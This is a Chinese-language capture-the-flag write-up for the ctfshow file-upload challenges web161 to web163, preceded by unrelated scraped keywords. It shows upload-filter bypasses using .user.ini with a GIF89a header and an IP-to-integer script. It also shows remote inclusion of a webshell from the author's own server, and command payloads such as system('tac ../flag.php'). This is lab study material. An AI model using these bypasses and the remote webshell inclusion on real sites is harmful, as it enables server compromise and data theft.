昌做网站,太原市建设厅网站,建立一个虚拟公司的网站,企业支付宝登录入口目录 1、web161
2、web162
3、web163 1、web161
先传配置文件#xff0c;可以上传成功 因为我前面给的 .user.ini 都是带了图片头 GIF89a 的#xff0c;前面的题这个图片头可以去掉#xff0c;但是在这里如果去掉是不行的。 因此后面上传的东西我们都带上这个图片头…目录 1、web161
2、web162
3、web163 1、web161
先传配置文件可以上传成功 因为我前面给的 .user.ini 都是带了图片头 GIF89a 的前面的题这个图片头可以去掉但是在这里如果去掉是不行的。 因此后面上传的东西我们都带上这个图片头
采用伪协议读取 flag.php 访问 upload 目录
base64 解码 拿到 flagctfshow{85cc388e-a505-4da9-943a-9bf970de0d43} 2、web162
配置文件无法上传 进行模糊测试后发现是点被过滤掉了 那么我们上传的文件名就不使用后缀即可这里以 test 为例 但是我们上传的内容里也无法使用点因此日志文件包含和伪协议读取的方法都无法使用。
这里我们让其包含远程服务器上的木马 下面打码部分为我自己服务器 ip 地址的长整型格式 转换脚本
#IP转换为长整型
def ip2long(ip):ip_listip.split(.) #⾸先先把ip的组成以.切割然后逐次转换成对应的⼆进制result 0for i in range(4): #0,1,2,3result resultint(ip_list[i])*256**(3-i)return result#长整型转换为IP
def long2ip(long):floor_list []num longfor i in reversed(range(4)):res divmod(num,256**i)floor_list.append(str(res[0]))num res[1]return ..join(floor_list)print(ip2long(服务器ip地址))上传这个 test
先命名为 test.png绕过前端后抓包改回 test 再上传 访问 upload 目录
报错
Warning: include(http://795707305/shell): failed to open stream: HTTP request failed! HTTP/1.1 400 Bad Request in /var/www/html/upload/test on line 2Warning: include(): Failed opening http://795707305/shell for inclusion (include_path.:/usr/local/lib/php) in /var/www/html/upload/test on line 2 默认情况下PHP 配置通常不允许通过 include 或 require 语句包含外部 URL所以我也不清楚它这里服务器上 php 的配置文件是否允许远程包含。
看了下我自己服务器的这个选项确实是关闭的 看了下网上其他师傅是可以的但是不知道为啥我这里就是不行 后面又去 b 站看了下视频发现它远程包含的就是一个 php 文件而我这里包含的 shell 是一个纯文本的东西我最开始以为是将这段内容包含进了 index.php 的代码里所以就没有考虑它不是 php 后缀是否可以正常解析的问题。 如何在没有 .php 后缀下又让它被当做 php 文件解析呢
于是我将木马命名为 index.php即首页文件 原以为这样我们就只需要包含 ip 地址就可以包含到 index.php
但是测了一下也是没有包含成功。
后面问了群里的师傅说用 flask我原本用的是 Apache 搭的服务重置了服务器Apache 和 php 其实都是刚下的可能还需要配置点什么吧不清楚因此我们将木马放到 flask 服务上去。 这里也懒得传两次了直接将要包含的 shell 放到 .user.ini 里面是可以这样进行包含的 之后访问 upload
没有出告警说明这次应该是包含成功了 调用木马 折腾死我了终于拿到 flagctfshow{6309f5e7-6b49-4d9a-8ef3-26afc5d85754} 3、web163
和上一题一样的方法而且这里如果传图片的话会被删掉还只能将包含的 shell 位置直接放在配置文件里而不能分开传。 访问 upload
/upload/?cmdsystem(ls); /upload/?cmdsystem(tac ../flag.php); 拿到 flagctfshow{1ccc238f-dfc2-4209-9c52-4fa46184d51e}
